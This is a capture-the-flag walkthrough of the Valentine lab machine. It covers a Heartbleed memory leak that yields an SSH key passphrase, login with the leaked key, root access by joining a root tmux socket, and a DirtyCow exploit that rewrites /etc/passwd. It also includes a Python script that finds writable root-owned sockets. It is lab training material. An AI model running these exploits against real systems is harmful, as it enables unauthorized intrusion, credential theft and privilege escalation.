Explore the fundamentals of cybersecurity with Valentine, an easy-level Capture The Flag (CTF) machine (valentine.htb). This straightforward writeup walks through the box step by step: service discovery, a Heartbleed memory leak that yields a passphrase, an exposed encrypted SSH key, and two routes to root, keeping each step clear and simple for players at this level.

Add Hosts

10.10.10.79 valentine.htb

Script to add the hosts entry automatically (idempotent: the grep skips the append if the exact line is already present, so it is safe to rerun):

ip="10.10.10.79"
domain="valentine.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV valentine.htb -Pn
Nmap scan report for valentine.htb (10.10.10.79)
Host is up (0.049s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.2.22
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2024-10-06T15:19:57+00:00; 0s from scanner time.
Service Info: Host: 10.10.10.136; OS: Linux; CPE: cpe:/o:linux:linux_kernel

CVE-2014-0160 (Heartbleed Vulnerability)

The HTTPS service is Apache 2.2.22 on an old Ubuntu release, so its OpenSSL build is worth checking for Heartbleed. A vulnerable server answers a TLS heartbeat request whose declared payload length is larger than the data actually sent by copying up to 64 KB of its own process memory back to the client, with no authentication required.

Validate the vulnerability (the script reports State: VULNERABLE on an affected host):

nmap --script=ssl-heartbleed -p 443 valentine.htb -Pn

Download the Proof of Concept (PoC):

git clone https://github.com/sensepost/heartbleed-poc.git
cd heartbleed-poc

Use the PoC and Extract the Password from the Dump:

-n1 limits the PoC to a single heartbeat and -f dump.bin writes the leaked memory to a file. Among the leaked bytes is a fragment containing a $text= parameter whose value is base64; decoding it gives the passphrase that unlocks the encrypted SSH key found during enumeration below.

python2 heartbleed-poc.py -n1 -f dump.bin valentine.htb -p 443
strings dump.bin | grep -o '\$text=[A-Za-z0-9+/=]*' | sed 's/\$text=//' | base64 -d

Note: the leaked memory is whatever happened to be in the server process at that moment, so the $text= fragment is not always present; rerun the PoC (or raise -n) until it shows up.

Enumeration

Perform Directory Bruteforcing:

dirb http://valentine.htb

Results:

+ http://10.10.10.79/cgi-bin/ (CODE:403 | SIZE:287)
+ http://10.10.10.79/decode (CODE:200 | SIZE:552)
+ http://10.10.10.79/dev/    (DIRECTORY)
+ http://10.10.10.79/encode (CODE:200 | SIZE:554)
+ http://10.10.10.79/index (CODE:200 | SIZE:38)
+ http://10.10.10.79/index.php (CODE:200 | SIZE:38)
+ http://10.10.10.79/server-status (CODE:403 | SIZE:292)

Investigate the /dev/ Directory:

Going to http://valentine.htb/dev/, you find two files:

  1. notes.txt
  2. hype_key

Contents of notes.txt:

To do:
1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

Download the Encrypted Key from hype_key and SSH into the Machine:

hype_key is a hex-encoded, passphrase-protected PEM RSA private key, and its name suggests the account is hype. Convert it back to PEM, strip the passphrase with openssl (enter the string recovered via Heartbleed when prompted), and lock the permissions down so ssh accepts the file:

curl -sk http://10.10.10.79/dev/hype_key > hype_key
xxd -r -p hype_key > hype_key_encrypted
openssl rsa -in hype_key_encrypted -out hype.key
chmod 600 hype.key
rm -f hype_key hype_key_encrypted
ssh -i hype.key hype@valentine.htb -o PubkeyAcceptedKeyTypes=+ssh-rsa

The PubkeyAcceptedKeyTypes option is needed because current OpenSSH clients no longer offer ssh-rsa (SHA-1) signatures by default, and this OpenSSH 5.9 server cannot do rsa-sha2-*; without it the login fails with Permission denied (publickey).

Privilege Escalation

Find the user.txt Flag:

find . -name user.txt -exec wc -c {} \; -exec cat {} \;

Check for Processes Running as Root (e.g., tmux):

ps -ef | grep tmux

The listing shows a tmux server running as root, together with the socket path it was started with (-S). A tmux client talks to its server over that Unix socket, and the kernel's only check on connecting is the socket file's permissions, so if hype can write to the socket, hype can join root's session.

Retrieve Commands from History:

history

From the history, the following command is revealed:

tmux -S /.devs/dev_sess

Before running it, confirm with ls -la that the socket is writable by hype (it is owned by root, so the group or world write bit must be set). Running that command then puts you in a shell spawned by root's tmux server, so you can now read the root.txt flag:

cat /root/root.txt
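
The attach works only because of the socket's file permissions, which is exactly what this added Python helper (not part of the original writeup) enumerates: every root-owned Unix socket the current user could connect to, with the tmux -S command to try. The default search roots, the pruning of pseudo-filesystems and the fake_stat helper used for offline checks are this example's own choices.

```python
"""Find root-owned Unix sockets the current user may connect to (tmux/screen attach points).

Added example for this writeup, not a tool from the original page. A tmux client
reaches its server through the socket given with -S; the kernel's check on connect()
is write permission on that socket file (plus search permission on the directories
above it), so a root-owned socket with group or world write bits lets an
unprivileged user join a session whose shells run as root.
"""
import os
import stat
import sys

def can_write_socket(st, uid, gids):
    """Discretionary-access check for opening socket `st` for writing as uid with groups gids."""
    if not stat.S_ISSOCK(st.st_mode):
        return False                      # not a socket: nothing to attach to
    if uid == 0:
        return True                       # root bypasses DAC
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def fake_stat(mode, uid, gid):
    """Build an os.stat_result for offline checks; mode includes the file-type bits (0o140000 = socket)."""
    return os.stat_result((mode, 0, 0, 1, uid, gid, 0, 0, 0, 0))

def find_root_sockets(roots=("/",), uid=None, gids=None, prune=("/proc", "/sys", "/dev")):
    """Return (mode string, path) for every root-owned socket under roots that the caller can write."""
    uid = os.getuid() if uid is None else uid
    gids = set(os.getgroups()) | {os.getgid()} if gids is None else set(gids)
    hits = []
    for root in roots:
        for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
            if dirpath.startswith(prune):
                dirnames[:] = []          # do not descend into pseudo-filesystems
                continue
            for name in filenames:        # os.walk lists non-directories, sockets included, here
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue              # unreadable or vanished entry
                if st.st_uid == 0 and can_write_socket(st, uid, gids):
                    hits.append((stat.filemode(st.st_mode), path))
    return hits

if __name__ == "__main__":
    for mode, path in find_root_sockets(tuple(sys.argv[1:]) or ("/",)):
        print(f"{mode} {path}    try: tmux -S {path}")
```

Run it as hype with no arguments to scan the whole filesystem, or pass directories to narrow the search. On a box laid out like this one it should list the /.devs/dev_sess socket the history entry points at, since the attach only succeeds if hype can write to it. The function checks the socket inode only; a socket inside a directory hype cannot traverse would still be listed but not reachable.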

Alternative Privilege Escalation (DirtyCow)

The system looks old enough to run a kernel vulnerable to DirtyCow (CVE-2016-5195), a race condition in the copy-on-write handling of private memory mappings that lets an unprivileged process write to read-only files such as /etc/passwd. To confirm, check the kernel version:

uname -a

Output:

Linux Valentine 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 GNU/Linux

A 3.2.0-23 kernel from 2012 predates the October 2016 fix, so it is vulnerable. Next, use searchsploit to find available DirtyCow exploits:

searchsploit dirty

From the results, select exploit 40839.c, which overwrites the root entry in /etc/passwd with a new uid 0 user named firefart whose password you choose at run time. Copy it to the working directory:

searchsploit -m exploits/linux/local/40839.c

Upload the exploit to the target (same key and option as the ssh login):

scp -o PubkeyAcceptedKeyTypes=+ssh-rsa -i hype.key 40839.c hype@valentine.htb:/home/hype/

Compile and run it on the target (gcc is available on the box); it prompts for the password to give the new user:

gcc -pthread 40839.c -o dirtycow -lcrypt
./dirtycow

Switch to the created user with the password you entered:

su firefart

You now have root access via the new user created by the DirtyCow exploit. The exploit saves a copy of the original file as /tmp/passwd.bak and reminds you to restore it; do that when you are done, because the modified /etc/passwd affects every login on the host and the race itself can leave the system unstable.